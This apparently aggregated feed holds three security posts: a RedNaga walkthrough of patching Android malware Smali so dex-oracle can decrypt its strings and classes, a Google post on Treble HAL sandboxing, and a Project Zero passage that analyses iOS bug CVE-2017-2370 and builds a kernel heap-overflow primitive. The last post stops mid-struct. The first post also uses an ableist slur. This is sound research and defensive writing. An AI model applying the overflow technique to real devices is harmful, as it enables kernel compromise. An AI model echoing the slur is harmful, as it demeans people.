Hacking with dex-oracle for Android Malware Deobfuscation

About a month or two ago, someone asked me to analyze some obfuscated Android malware. Recently, I finally had a chance to take a look. I ended up using dex-oracle along with some tricks to partially deobfuscate it. In this post, I’m going to explain the tricks and the overall process I used. This post will be useful if you deal with a lot of obfuscated Android apps.

The main problem was that dex-oracle didn’t work “out of the box”. It took some “hacking” to make it work. Specifically, I modified an existing deobfuscation plugin to create two new plugins, and I slightly modified the app. It’s really hard to make completely generalized deobfuscation tools, or any kind of advanced tool, so you’ll need to know how a tool works in order to modify it to suit your needs.

The Sample

Here’s the SHA256:

$ shasum -a 256 xjmurla.gqscntaej.bfdiays.apk
d3becbee846560d0ffa4f3cda708d69a98dff92785b7412d763f810c51c0b091 xjmurla.gqscntaej.bfdiays.apk

High-Level Analysis

I like to start with a decompilation just to get a high-level overview of the package structure. Here’s the class list:

class list

Some class names have been ProGuard’ed (a, b, c, etc.) but some haven’t (Ceacbcbf). The classes ProGuard skipped are probably Android components (activities, services, broadcast receivers, etc.), which must be declared in the manifest. Any tool that renamed them automatically would also have to rewrite the manifest, which is hard, so their gibberish names were probably chosen by hand. That suggests the obfuscation is home-made and partially done manually, which in turn suggests the app is malicious: a legit developer would probably pull a commercial obfuscator off the shelf and just use that. They wouldn’t waste time changing their class names to something indecipherable like Aeabffdccdac.

The code is obfuscated. Below is a class which shows the obfuscation:

obfuscated method decompilation

You can’t see any strings or class names, which is really annoying. This looks like something Simplify can handle, but, spoilers, it fails miserably. That’s fine. I have many tricks up my sleeve. Let’s take a look at the Smali and see if anything jumps out.

String and Class Obfuscation

The first type of obfuscation which jumped out at me was an “indexed string lookup” type obfuscation.

const v2, 0x320fb26f
invoke-static {v2}, Lxjmurla/gqscntaej/bfdiays/f;->a(I)Ljava/lang/String;
move-result-object v2

This pattern is found hundreds of times in the code. It takes a number, passes it to f.a(int), and gets a string back. This is some basic “level 1” style encryption. There’s probably a big method somewhere which builds an array of strings that the number indexes into.

A second type of obfuscation hides class constants using an identical technique:

const v1, 0x19189b07
invoke-static {v1}, Lxjmurla/gqscntaej/bfdiays/g;->c(I)Ljava/lang/Class;
move-result-object v1

This code passes a number to g.c(int) and gets back a class object (const-class).

You may be thinking you’ll have to reverse engineer the lookup methods, and you’d be wrong. It’s cool and all to deep dive into the complex code and completely master it by writing a decryption routine. But honestly, fuck that. Speed is the name of the game, and I really don’t have time to fuck around with this malware author’s bullshit, retarded, home-made, amateur hour obfuscation. Instead of reversing everything, consider that these “lookup” methods are both static. It should be possible to just execute them with the same inputs from the code to get back the decrypted output. For example, in the case of string decryption, I should be able to execute f.a(0x320fb26f) and get back the decrypted string.

The question is, of course, how do you execute just the target method code? It’s an APK. How can you execute just the method you want with the inputs you want? How do you harness the target methods? There are two paths you can go by:

  1. Convert target DEX to a JAR using dex2jar or enjarify. Then, import the JAR into a Java app and call the decryption code from your Java app.
  2. Create a stub / driver app which takes command line arguments and can reflect methods in a DEX file. Then, execute the driver app + target DEX on an emulator.
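The heart of option #2 is plain reflection: load a class by name, find the static lookup method, and call it with the constant from the code. Below is a minimal JVM sketch of that step, not dex-oracle’s actual driver. FakeLookup and StaticInvoker are hypothetical names, and FakeLookup is compiled in only so the example runs; on a device the class would come from the target DEX instead.

```java
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;

// Hypothetical stand-in for an obfuscated lookup class such as f.
class FakeLookup {
    private static final String[] TABLE = {"alpha", "beta", "gamma"};

    static String a(int key) {
        return TABLE[key - 0x100];
    }
}

class StaticInvoker {
    // Finds a static method taking one int on the named class and calls it with arg.
    static Object invokeStaticInt(String className, String methodName, int arg) {
        try {
            Class<?> cls = Class.forName(className);
            Method m = cls.getDeclaredMethod(methodName, int.class);
            m.setAccessible(true);        // lookup methods are often package-private
            return m.invoke(null, arg);   // null receiver: the method is static
        } catch (InvocationTargetException e) {
            // The target method itself threw; unwrap so the caller sees the real cause.
            throw new RuntimeException("target method threw " + e.getCause(), e.getCause());
        } catch (ReflectiveOperationException e) {
            throw new IllegalStateException("cannot invoke " + className + "." + methodName, e);
        }
    }
}
```

For example, `StaticInvoker.invokeStaticInt(FakeLookup.class.getName(), "a", 0x101)` returns "beta". An exception raised inside the target arrives wrapped in InvocationTargetException, which is the shape of the failure in the dex-oracle log further down.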

As it happens, I’ve already created dex-oracle, which does #2. I like #2 more than #1 because it doesn’t rely on decompilers, which often introduce subtle logic bugs. However, I’ve used #1 a few times in a pinch, so it’s worth mentioning. I went about adding support for this type of obfuscation to dex-oracle. The plugins were added in the commit Add indexed string + class lookups.

The way dex-oracle works is pretty simple. It contains a collection of plugins which define regular expressions which pull out key bits of information – method calls and arguments. Then, it constructs real method calls with the arguments you pull out and passes them to a driver which executes the original DEX file on an emulator. Finally, the plugin defines how the driver output should be used to modify the method.

For example, the regular expression could look for “a const number, a call to a static method which takes a number and returns a string, and a move of the result to a register”. Then, the driver executes that method with the number and returns the decrypted string. Finally, the original string lookup code is replaced with just the decrypted string. You can read more about how it works in the TetCon 2016 Android Deobfuscation Presentation.
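As a rough illustration of that regex-driven rewrite, here is a Java sketch. It is not dex-oracle’s plugin code: IndexedLookupRewriter and its Oracle callback are hypothetical, and the callback stands in for the driver running on the emulator. It only handles the exact three-instruction shape shown earlier and does minimal string escaping.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

class IndexedLookupRewriter {
    // Hypothetical oracle: given a method reference and an int argument, returns the decrypted string.
    interface Oracle {
        String call(String methodRef, int arg);
    }

    // Matches: const vA, <int> / invoke-static {vA}, <static (I)String method> / move-result-object vB
    private static final Pattern LOOKUP = Pattern.compile(
            "const (v\\d+), (-?0x[0-9a-fA-F]+)\\s+"
            + "invoke-static \\{\\1\\}, (L[^;]+;->[\\w$]+\\(I\\)Ljava/lang/String;)\\s+"
            + "move-result-object (v\\d+)");

    static String rewrite(String smali, Oracle oracle) {
        Matcher m = LOOKUP.matcher(smali);
        StringBuffer out = new StringBuffer();
        while (m.find()) {
            int arg = (int) Long.decode(m.group(2)).longValue();
            String plain = oracle.call(m.group(3), arg);
            // Minimal Smali string escaping: backslashes and double quotes only.
            String escaped = plain.replace("\\", "\\\\").replace("\"", "\\\"");
            String replacement = "const-string " + m.group(4) + ", \"" + escaped + "\"";
            m.appendReplacement(out, Matcher.quoteReplacement(replacement));
        }
        m.appendTail(out);
        return out.toString();
    }
}
```

The three instructions collapse into one const-string that writes to the register the original move-result-object targeted, so the code that follows is unaffected.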

dex-oracle Before Modification

Unfortunately, even with the new plugins, dex-oracle fails. To keep things simple, I disable all plugins except IndexStringLookup and I only process the d class from the screenshot above.

$ dex-oracle xjmurla.gqscntaej.bfdiays.apk --disable-plugins bitwiseantiskid,stringdecryptor,undexguard,unreflector,indexedclasslookup -i '/d'
Invalid date/time in zip entry
Invalid date/time in zip entry
Invalid date/time in zip entry
Invalid date/time in zip entry
Invalid date/time in zip entry
Invalid date/time in zip entry
Invalid date/time in zip entry
Invalid date/time in zip entry
Invalid date/time in zip entry
Optimizing 11 methods over 23 Smali files.
[WARN] 2017-10-28 12:28:45: Unsuccessful status: failure for Error executing 'static java.lang.String xjmurla.gqscntaej.bfdiays.f.a(int)' with 'I:839889519'
java.lang.reflect.InvocationTargetException
    at java.lang.reflect.Method.invokeNative(Native Method)
    at java.lang.reflect.Method.invoke(Method.java:515)
    at org.cf.oracle.Driver.invokeMethod(Driver.java:71)
    at org.cf.oracle.Driver.main(Driver.java:131)
    at com.android.internal.os.RuntimeInit.nativeFinishInit(Native Method)
    at com.android.internal.os.RuntimeInit.main(RuntimeInit.java:243)
    at dalvik.system.NativeStart.main(Native Method)
Caused by: java.lang.NullPointerException
    at xjmurla.gqscntaej.bfdiays.f.a(SourceFile:528)
    ... 7 more
// ** SNIP MANY SIMILAR ERRORS **
Optimizations: string_lookups=13
Invalid date/time in zip entry
// ** SNIP DUMB WARNINGS **
Invalid date/time in zip entry
Time elapsed 1.954255 seconds

The Invalid date/time in zip entry stuff is just noise. Maybe they tried obfuscating the timestamp in the ZIP? I dunno.

What concerns me is the Unsuccessful status: failure for Error executing 'static java.lang.String xjmurla.gqscntaej.bfdiays.f.a(int)' with 'I:839889519'. The error tells me there’s a NullPointerException when it executes f.a(int). (839889519 is just 0x320fb26f, the constant from the first snippet, in decimal.) Looks like every time it tried to call that method, it failed. So, let’s look at f.a(int).

.method static a(I)Ljava/lang/String;
    .registers 3

    sget-object v0, Lxjmurla/gqscntaej/bfdiays/f;->k:[Ljava/lang/String;
    const v1, 0x320fb1f0
    sub-int v1, p0, v1
    aget-object v0, v0, v1
    return-object v0
.end method

The entire method is pretty small. It just subtracts a big constant from the first argument and uses the result as an index into a string array, Lxjmurla/gqscntaej/bfdiays/f;->k:[Ljava/lang/String;. Well, let’s look at how f;->k is initialized.
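Rendered as Java, the lookup is a one-liner, which also shows where the NullPointerException in the log comes from: indexing into k while it is still null. FLookup is a hypothetical stand-in for f, and the table contents used below are placeholders; only the arithmetic (0x320fb26f - 0x320fb1f0 = 127) comes from the Smali.

```java
class FLookup {
    // Stand-in for f;->k. In the sample it is only filled in by Ceacabcbf;->a()V,
    // so under dex-oracle, where that never runs, it stays null.
    static String[] k;

    // Java equivalent of f;->a(I): subtract the constant from the argument, index into k.
    static String a(int p0) {
        return k[p0 - 0x320fb1f0];
    }
}
```

Calling `FLookup.a(0x320fb26f)` before k is assigned throws NullPointerException; once k holds at least 128 entries, the same call returns `k[127]`.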

$ ag -Q 'Lxjmurla/gqscntaej/bfdiays/f;->k:[Ljava/lang/String;'
xjmurla/gqscntaej/bfdiays/Ceacabcbf.smali
169: sput-object v0, Lxjmurla/gqscntaej/bfdiays/f;->k:[Ljava/lang/String;
245: sget-object v0, Lxjmurla/gqscntaej/bfdiays/f;->k:[Ljava/lang/String;
256: sget-object v0, Lxjmurla/gqscntaej/bfdiays/f;->k:[Ljava/lang/String;

xjmurla/gqscntaej/bfdiays/f.smali
72: sget-object v0, Lxjmurla/gqscntaej/bfdiays/f;->k:[Ljava/lang/String;

There’s only one sput-object and it’s in xjmurla/gqscntaej/bfdiays/Ceacabcbf.smali. By looking for this line in Ceacabcbf, we find private Ceacabcbf;->a()V. This is a big, long, complicated method which contains a HUGE string literal which is processed, chunked up, and stored in f;->k. Hmm, our NullPointerException is caused by this field not getting initialized. This means that Ceacabcbf;->a()V is not getting called during execution of the string decryption method. Well, when is it called?

$ ag -Q 'Lxjmurla/gqscntaej/bfdiays/Ceacabcbf;->a()V'
xjmurla/gqscntaej/bfdiays/Ceacabcbf.smali
1313: invoke-direct {p0}, Lxjmurla/gqscntaej/bfdiays/Ceacabcbf;->a()V

Ahh, it’s only called in one place, inside Ceacabcbf itself. Let’s find that.

.method public onCreate()V
    .registers 1

    invoke-super {p0}, Landroid/app/Application;->onCreate()V
    sput-object p0, Lxjmurla/gqscntaej/bfdiays/Ceacabcbf;->a:Lxjmurla/gqscntaej/bfdiays/Ceacabcbf;
    invoke-direct {p0}, Lxjmurla/gqscntaej/bfdiays/Ceacabcbf;->a()V
    return-void
.end method

It’s called in Ceacabcbf;->onCreate()V. This class is a subclass of Application. Without looking at the manifest, I’m pretty sure that when the app starts, this component is created, onCreate()V is called, the decrypted string array is built, and most importantly f;->k is initialized. Hmm, how can I make it so that dex-oracle calls this method when decrypting strings?

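My first thought is to add a method call to Ceacabcbf;->a()V in f;-><clinit>. That would ensure that when the string decryption class f is loaded, it initializes the decrypted string array. BUT, a()V is a direct method: it’s a private instance method (note the invoke-direct {p0} above), so f isn’t allowed to call it, and it needs a Ceacabcbf instance anyway. WHAT TO DO?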

Well, this is kind of dumb but it works sometimes. Just create a new public, static method called Ceacabcbf;->init_decrypt()V and copy the code from Ceacabcbf;->a()V. Then, add a line to call this method in f;-><clinit>:

.method static constructor <clinit>()V
    .registers 1

    const/4 v0, 0x0
    sput v0, Lxjmurla/gqscntaej/bfdiays/f;->a:I
    sput v0, Lxjmurla/gqscntaej/bfdiays/f;->d:I
    sput v0, Lxjmurla/gqscntaej/bfdiays/f;->e:I
    sput v0, Lxjmurla/gqscntaej/bfdiays/f;->f:I
    const/4 v0, 0x4
    new-array v0, v0, [Ljava/lang/String;
    sput-object v0, Lxjmurla/gqscntaej/bfdiays/f;->h:[Ljava/lang/String;
    const-string v0, ""
    sput-object v0, Lxjmurla/gqscntaej/bfdiays/f;->i:Ljava/lang/Object;

    # LOL MONEY, MONEY LOL
    invoke-static {}, Lxjmurla/gqscntaej/bfdiays/Ceacabcbf;->init_decrypt()V

    return-void
.end method
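In Java terms, the patch relies on class initialization: a class’s static initializer (<clinit>) runs once, before the first static method call on that class. The sketch below uses hypothetical names (Init.initDecrypt plays the copied Ceacabcbf;->init_decrypt()V, StringsF plays f) and a placeholder table; it only illustrates the ordering, not the sample’s decryption.

```java
class Init {
    static int calls = 0;

    // Stand-in for the copied init_decrypt(): builds the lookup table f;->k.
    static void initDecrypt() {
        calls++;
        StringsF.k = new String[] {"first", "second"};
    }
}

class StringsF {
    static String[] k;

    // Equivalent of the line added to f;-><clinit>: runs once, when StringsF is first used.
    static {
        Init.initDecrypt();
    }

    static String a(int p0) {
        return k[p0 - 0x10];
    }
}
```

The first call to `StringsF.a` triggers the initializer, so the table exists by the time the lookup indexes into it, and later calls do not rebuild it. Placing the call last in <clinit>, as the patch does, lets the original field setup run first so nothing after it can clobber the freshly built table.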

dex-oracle After Modification

After making some changes which will hopefully work, we need to rebuild the DEX from the modified Smali and try dex-oracle on it.

$ smali ass out -o xjmurla_mod1.dex
$ dex-oracle xjmurla_mod1.dex --disable-plugins bitwiseantiskid,stringdecryptor,undexguard,unreflector,indexedclasslookup -i '/d'
Optimizing 11 methods over 23 Smali files.
Optimizations: string_lookups=13
Time elapsed 2.034493 seconds

No errors. Let’s see the decompilation.

$ d2j-dex2jar.sh xjmurla_mod1_oracle.dex
dex2jar xjmurla_mod1_oracle.dex -> ./xjmurla_mod1_oracle-dex2jar.jar
$ jd xjmurla_mod1_oracle-dex2jar.jar

deobfuscated strings

Oh, hello there Mr. C&C domain! GET REKT BRO.

get rekt

Ok, but that still leaves the class deobfuscation. That’s still annoying, right? Well, to keep this post short: dex-oracle fails when deobfuscating classes for the same reason it originally failed for strings. The same Ceacabcbf;->a()V method needs to be called.

The same trick can be used – just call Ceacabcbf;->init_decrypt()V in g;-><clinit>. However, g doesn’t have a <clinit> so you’ll have to add one:

.method static constructor <clinit>()V
    .registers 0

    invoke-static {}, Lxjmurla/gqscntaej/bfdiays/Ceacabcbf;->init_decrypt()V
    return-void
.end method

Now, rebuild and let dex-oracle do its thing:

$ smali ass out -o xjmurla_mod2.dex
$ dex-oracle xjmurla_mod2.dex -i '/d'
Optimizing 11 methods over 23 Smali files.
Optimizations: string_decrypts=0, class_lookups=13, string_lookups=13
Time elapsed 3.099335 seconds

Let’s see if the decompilation looks any different.

$ d2j-dex2jar.sh xjmurla_mod2_oracle.dex
dex2jar xjmurla_mod2_oracle.dex -> ./xjmurla_mod2_oracle-dex2jar.jar
$ jd xjmurla_mod2_oracle-dex2jar.jar

deobfuscated strings and classes

There’s not much difference for this method, but other methods have a lot more information, especially in the Smali where you can see lots of const-classes. There’s still one call to g.c(int) which isn’t deobfuscated. I found out that this is because the method call succeeds but returns null. Maybe that’s why it’s in a try-catch? Maybe it’s trying to load a class which doesn’t exist on every Android API version?

One final test: run it against the entire DEX file.

$ dex-oracle xjmurla_mod2.dex
Optimizing 125 methods over 23 Smali files.
Optimizations: string_decrypts=0, class_lookups=354, string_lookups=330
Time elapsed 3.306326 seconds

It worked. Cool. Now there are lots of strings! This should also make it a lot easier for Simplify to work because there’s less code to execute and fewer places to fail.

Summary

Hopefully after reading this you have a better idea of how to bend dex-oracle to suit your needs. It’s pretty flexible and great when you can isolate the code you need to run to a single method. Sometimes you need to make changes to an Android app to help dex-oracle, but Smali is relatively easy to modify and a lot of malware doesn’t bother doing anti-tampering checks.

from RedNaga Security http://ift.tt/2gLMz5s


Shut the HAL Up

Posted by Jeff Vander Stoep, Senior Software Engineer, Android Security

Updates are essential for security, but they can be difficult and expensive for
device manufacturers. Project Treble is making updates easier by separating the underlying vendor
implementation from the core Android framework. This modularization allows
platform and vendor-provided components to be updated independently of each
other. While easier and faster updates are awesome, Treble’s increased
modularity is also designed to improve security.

Isolating HALs

A Hardware Abstraction Layer (HAL) provides an interface between device-agnostic code
and device-specific hardware implementations. HALs are commonly packaged as
shared libraries loaded directly into the process that requires hardware
interaction. Security boundaries are enforced at the process level. Therefore,
loading the HAL into a process means that the HAL is running in the same
security context as the process it’s loaded into.

The traditional method of running HALs in-process means that the process needs
all the permissions required by each in-process HAL, including direct access to
kernel drivers. Likewise, all HALs in a process have access to the same set of
permissions as the rest of the process, including permissions required by other
in-process HALs. This results in over-privileged processes and HALs that have
access to permissions and hardware that they shouldn’t.

Figure 1. Traditional method of multiple HALs in one process.

Moving HALs into their own processes better adheres to the principle of
least privilege. This provides two distinct advantages:

  1. Each HAL runs in its own sandbox and is permitted access to only the
    hardware driver it controls, and the permissions granted to the process are
    limited to the permissions required to do its job.

  2. Similarly, the process loses access to hardware drivers and other
    permissions and capabilities needed by the HALs.

Figure 2. Each HAL runs in its own process.

Moving HALs into their own processes is great for security, but it comes at the
cost of increased IPC overhead between the client process and the HAL. Improvements to the binder driver made IPC between HALs and clients practical. Introducing
scatter-gather into binder improves the performance of each transaction by
removing the need for the serialization/deserialization steps and reducing the
number of copy operations performed on data from three down to one. Android O
also introduces binder domains to provide separate communication streams for
vendor and platform components. Apps and the Android frameworks continue to use
/dev/binder, but vendor-provided components now use /dev/vndbinder.
Communication between the platform and vendor components must use /dev/hwbinder.
Other means of IPC between platform and vendor are disallowed.
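The binder domain split can be restated as a small lookup. This Java toy is only a summary of the rule in the paragraph above, not how Android enforces it; Side and BinderDomains are made-up names, and reading “vendor-provided components now use /dev/vndbinder” as vendor-to-vendor IPC is an interpretation.

```java
// Hypothetical model: which side of the Treble split a process is on.
enum Side { PLATFORM, VENDOR }

class BinderDomains {
    // Returns the binder device node that IPC between a and b goes through.
    static String deviceFor(Side a, Side b) {
        if (a == Side.PLATFORM && b == Side.PLATFORM) {
            return "/dev/binder";     // apps and the Android framework
        }
        if (a == Side.VENDOR && b == Side.VENDOR) {
            return "/dev/vndbinder";  // vendor-provided components among themselves
        }
        return "/dev/hwbinder";       // any platform <-> vendor communication
    }
}
```

Anything that crosses the platform/vendor boundary lands on /dev/hwbinder regardless of direction, which matches the rule that no other IPC path between the two sides is allowed.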

Case study: System Server

Many of the services offered to apps by the core Android OS are provided by the
system server. As Android has grown, so have system server’s responsibilities and
permissions, making it an attractive target for an attacker.
As part of project Treble, approximately 20 HALs were moved out of system
server, including the HALs for sensors, GPS, fingerprint, Wi-Fi, and more.
Previously, a compromise in any of those HALs would gain privileged system
permissions, but in Android O, permissions are restricted to the subset needed
by the specific HAL.

Case study: media frameworks

Efforts to harden the media stack in Android Nougat continued in Android O. In Nougat,
mediaserver was split into multiple components to better adhere to the principle
of least privilege, with audio hardware access restricted to audioserver, camera
hardware access restricted to cameraserver, and so on. In Android O, most direct
hardware access has been entirely removed from the media frameworks. For example,
HALs for audio, camera, and DRM have been moved out of audioserver,
cameraserver, and drmserver respectively.

Reducing and isolating the attack surface of the kernel

The Linux kernel is the primary enforcer of the security model on Android.
Attempts to escape sandboxing mechanisms often involve attacking the kernel. An analysis
of kernel vulnerabilities on Android showed that they overwhelmingly occurred in
and were reached through hardware drivers.

De-privileging system server and the media frameworks is important because they
interact directly with installed apps. Removing direct access to hardware
drivers makes bugs difficult to reach and adds another layer of defense to
Android’s security model.

from Android Developers Blog http://ift.tt/2veReTw

Exception-oriented exploitation on iOS

Posted by Ian Beer, Project Zero

This post covers the discovery and exploitation of CVE-2017-2370, a heap buffer overflow in the mach_voucher_extract_attr_recipe_trap mach trap. It covers the bug, the development of an exploitation technique which involves repeatedly and deliberately crashing, and how to build live kernel introspection features using old kernel exploits.

It’s a trap!
Alongside a large number of BSD syscalls (like ioctl, mmap, execve and so on) XNU also has a small number of extra syscalls supporting the MACH side of the kernel called mach traps. Mach trap syscall numbers start at 0x1000000. Here’s a snippet from the syscall_sw.c file where the trap table is defined:

/* 12 */ MACH_TRAP(_kernelrpc_mach_vm_deallocate_trap, 3, 5, munge_wll),
/* 13 */ MACH_TRAP(kern_invalid, 0, 0, NULL),
/* 14 */ MACH_TRAP(_kernelrpc_mach_vm_protect_trap, 5, 7, munge_wllww),

Most of the mach traps are fast-paths for kernel APIs that are also exposed via the standard MACH MIG kernel apis. For example mach_vm_allocate is also a MIG RPC which can be called on a task port.

Mach traps provide a faster interface to these kernel functions by avoiding the serialization and deserialization overheads involved in calling kernel MIG APIs. But without that autogenerated code, complex mach traps often have to do lots of manual argument parsing, which is tricky to get right.

In iOS 10 a new entry appeared in the mach_traps table:

/* 72 */ MACH_TRAP(mach_voucher_extract_attr_recipe_trap, 4, 4, munge_wwww),

The mach trap entry code will pack the arguments passed to that trap by userspace into this structure:

 struct mach_voucher_extract_attr_recipe_args {
   PAD_ARG_(mach_port_name_t, voucher_name);
   PAD_ARG_(mach_voucher_attr_key_t, key);
   PAD_ARG_(mach_voucher_attr_raw_recipe_t, recipe);
   PAD_ARG_(user_addr_t, recipe_size);
 };

A pointer to that structure will then be passed to the trap implementation as the first argument. It’s worth noting at this point that adding a new syscall like this means it can be called from every sandboxed process on the system. Up until you reach a mandatory access control hook (and there are none here) the sandbox provides no protection.

Let’s walk through the trap code:

kern_return_t
mach_voucher_extract_attr_recipe_trap(
 struct mach_voucher_extract_attr_recipe_args *args)
{
 ipc_voucher_t voucher = IV_NULL;
 kern_return_t kr = KERN_SUCCESS;
 mach_msg_type_number_t sz = 0;

 if (copyin(args->recipe_size, (void *)&sz, sizeof(sz)))
   return KERN_MEMORY_ERROR;

copyin has similar semantics to copy_from_user on Linux. This copies 4 bytes from the userspace pointer args->recipe_size to the sz variable on the kernel stack, ensuring that the whole source range really is in userspace and returning an error code if the source range either wasn’t completely mapped or pointed to kernel memory. The attacker now controls sz.

 if (sz > MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE)
   return MIG_ARRAY_TOO_LARGE;

mach_msg_type_number_t is a 32-bit unsigned type so sz has to be less than or equal to MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE (5120) to continue.

 voucher = convert_port_name_to_voucher(args->voucher_name);
 if (voucher == IV_NULL)
   return MACH_SEND_INVALID_DEST;

convert_port_name_to_voucher looks up the args->voucher_name mach port name in the calling task’s mach port namespace and checks whether it names an ipc_voucher object, returning a reference to the voucher if it does. So we need to provide a valid voucher port as voucher_name to continue past here.

 if (sz < MACH_VOUCHER_TRAP_STACK_LIMIT) {
   /* keep small recipes on the stack for speed */
   uint8_t krecipe[sz];
   if (copyin(args->recipe, (void *)krecipe, sz)) {
     kr = KERN_MEMORY_ERROR;
       goto done;
   }
   kr = mach_voucher_extract_attr_recipe(voucher,
            args->key, (mach_voucher_attr_raw_recipe_t)krecipe, &sz);

   if (kr == KERN_SUCCESS && sz > 0)
     kr = copyout(krecipe, (void *)args->recipe, sz);
 }

If sz was less than MACH_VOUCHER_TRAP_STACK_LIMIT (256) then this allocates a small variable-length-array on the kernel stack and copies in sz bytes from the userspace pointer in args->recipe to that VLA. The code then calls the target mach_voucher_extract_attr_recipe method before calling copyout (which takes its kernel and userspace arguments the other way round to copyin) to copy the results back to userspace. All looks okay, so let’s take a look at what happens if sz was too big to let the recipe be “kept on the stack for speed”:
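The two size checks can be modeled as a function from sz to the path the trap takes. This Java sketch uses hypothetical names (RecipePath, Path) and the constants from the text; Java has no unsigned int, so Integer.compareUnsigned stands in for the unsigned comparisons on mach_msg_type_number_t, and the voucher lookup between the two checks is left out.

```java
class RecipePath {
    static final int MAX_RAW_RECIPE_ARRAY_SIZE = 5120; // MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE
    static final int TRAP_STACK_LIMIT = 256;            // MACH_VOUCHER_TRAP_STACK_LIMIT

    enum Path { TOO_LARGE, STACK, HEAP }

    // sz is a 32-bit unsigned value in the kernel, so every comparison is unsigned.
    static Path choose(int sz) {
        if (Integer.compareUnsigned(sz, MAX_RAW_RECIPE_ARRAY_SIZE) > 0) {
            return Path.TOO_LARGE; // MIG_ARRAY_TOO_LARGE
        }
        return Integer.compareUnsigned(sz, TRAP_STACK_LIMIT) < 0 ? Path.STACK : Path.HEAP;
    }
}
```

A value like 0xFFFFFFFF, which would be -1 as a signed int, is rejected rather than slipping under the limit, and every sz from 256 to 5120 inclusive takes the heap path examined next.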

 else {
   uint8_t *krecipe = kalloc((vm_size_t)sz);
   if (!krecipe) {
     kr = KERN_RESOURCE_SHORTAGE;
     goto done;
   }

   if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) {
     kfree(krecipe, (vm_size_t)sz);
     kr = KERN_MEMORY_ERROR;
     goto done;
   }

The code continues on but let’s stop here and look really carefully at that snippet. It calls kalloc to make an sz-byte sized allocation on the kernel heap and assigns the address of that allocation to krecipe. It then calls copyin to copy args->recipe_size bytes from the args->recipe userspace pointer to the krecipe kernel heap buffer.

If you didn’t spot the bug yet, go back up to the start of the code snippets and read through them again. This is a case of a bug that’s so completely wrong that at first glance it actually looks correct!

To explain the bug it’s worth donning our detective hat and trying to work out what happened to cause such code to be written. This is just conjecture but I think it’s quite plausible.

a recipe for copypasta
Right above the mach_voucher_extract_attr_recipe_trap method in mach_kernelrpc.c there’s the code for host_create_mach_voucher_trap, another mach trap.

These two functions look very similar. They both have a branch for a small and large input size, with the same /* keep small recipes on the stack for speed */ comment in the small path and they both make a kernel heap allocation in the large path.

It’s pretty clear that the code for mach_voucher_extract_attr_recipe_trap has been copy-pasted from host_create_mach_voucher_trap then updated to reflect the subtle difference in their prototypes. That difference is that the size argument to host_create_mach_voucher_trap is an integer but the size argument to mach_voucher_extract_attr_recipe_trap is a pointer to an integer.

This means that mach_voucher_extract_attr_recipe_trap requires an extra level of indirection; it first needs to copyin the size before it can use it. Even more confusingly the size argument in the original function was called recipes_size and in the newer function it’s called recipe_size (one fewer ‘s’.)

Here’s the relevant code from the two functions, the first snippet is fine and the second has the bug:

host_create_mach_voucher_trap:

if (copyin(args->recipes, (void *)krecipes, args->recipes_size)) {
 kfree(krecipes, (vm_size_t)args->recipes_size);
 kr = KERN_MEMORY_ERROR;
 goto done;
}

mach_voucher_extract_attr_recipe_trap:

 if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) {
   kfree(krecipe, (vm_size_t)sz);
   kr = KERN_MEMORY_ERROR;
   goto done;
 }

My guess is that the developer copy-pasted the code for the entire function then tried to add the extra level of indirection but forgot to change the third argument to the copyin call shown above. They built XNU and looked at the compiler error messages. XNU builds with clang, which gives you fancy error messages like this:

error: no member named ‘recipes_size’ in ‘struct mach_voucher_extract_attr_recipe_args’; did you mean ‘recipe_size’?
if (copyin(args->recipes, (void *)krecipes, args->recipes_size)) {
                                                 ^~~~~~~~~~~~
                                                 recipe_size

Clang assumes that the developer has made a typo and typed an extra ‘s’. Clang doesn’t realize that its suggestion is semantically totally wrong and will introduce a critical memory corruption issue. I think that the developer took clang’s suggestion, removed the ‘s’, rebuilt and the code compiled without errors.

Building primitives
copyin on iOS will fail if the size argument is greater than 0x4000000. Since recipe_size also needs to be a valid userspace pointer, this means we have to be able to map an address that low. From a 64-bit iOS app we can do this by giving the pagezero_size linker option a small value. We can completely control the size of the copy by ensuring that our data is aligned right up to the end of a page and then unmapping the page after it. copyin will fault when the copy reaches the unmapped source page and stop.

If the copyin fails the kalloced buffer will be immediately freed.

Putting all the bits together we can make a kalloc heap allocation of between 256 and 5120 bytes and overflow out of it as much as we want with completely controlled data.
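The arithmetic behind this primitive fits in a few lines. This is a simplified Java model, not kernel code: RecipeOverflowModel and its parameters are hypothetical, the 0x4000000 limit is taken from the text, and treating an over-limit size as copying nothing is an assumption. mappedBytes means how much readable memory follows args->recipe before the unmapped page.

```java
class RecipeOverflowModel {
    static final long COPYIN_MAX_SIZE = 0x4000000L; // copyin fails above this (per the text)

    // Models the buggy copyin(args->recipe, krecipe, args->recipe_size) on the heap path:
    //   sz             - the real kalloc buffer size (256..5120), read from *recipe_size
    //   recipeSizeAddr - the userspace address of sz, wrongly passed as the copy length
    //   mappedBytes    - bytes readable from args->recipe before the first unmapped page
    // Returns bytes written past the end of the buffer, or -1 if copyin rejects the size.
    static long overflowBytes(long sz, long recipeSizeAddr, long mappedBytes) {
        if (recipeSizeAddr > COPYIN_MAX_SIZE) {
            return -1; // assumption: nothing is copied in this case
        }
        long copied = Math.min(recipeSizeAddr, mappedBytes); // the copy faults at the unmapped page
        return Math.max(0, copied - sz);
    }
}
```

With a 256-byte buffer, a low address such as 0x100000 for sz, and 320 mapped bytes after args->recipe, the model gives a 64-byte overflow: the attacker picks the overflow length through the mapping layout, not through sz.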

When I’m working on a new exploit I spend a lot of time looking for new primitives: for example, objects allocated on the heap which, if I could overflow into them, would let me cause a chain of interesting things to happen. Generally, interesting means that if I corrupt it I can use it to build a better primitive. Usually my end goal is to chain these primitives to get an arbitrary, repeatable and reliable memory read/write.

To this end one style of object I’m always on the lookout for is something that contains a length or size field which can be corrupted without having to fully corrupt any pointers. This is usually an interesting target and warrants further investigation.

For anyone who has ever written a browser exploit this will be a familiar construct!

ipc_kmsg
Reading through the XNU code for interesting looking primitives I came across struct ipc_kmsg:

struct ipc_kmsg {
 mach_msg_size_t            ikm_size;
 struct ipc_kmsg            *ikm_next;
 struct ipc_kmsg            *ikm_prev;
 mach_msg_header_t          *ikm_header;
 ipc_port_t                 ikm_prealloc;
 ipc_port_t                 ikm_voucher;
 mach_msg_priority_t        ikm_qos;
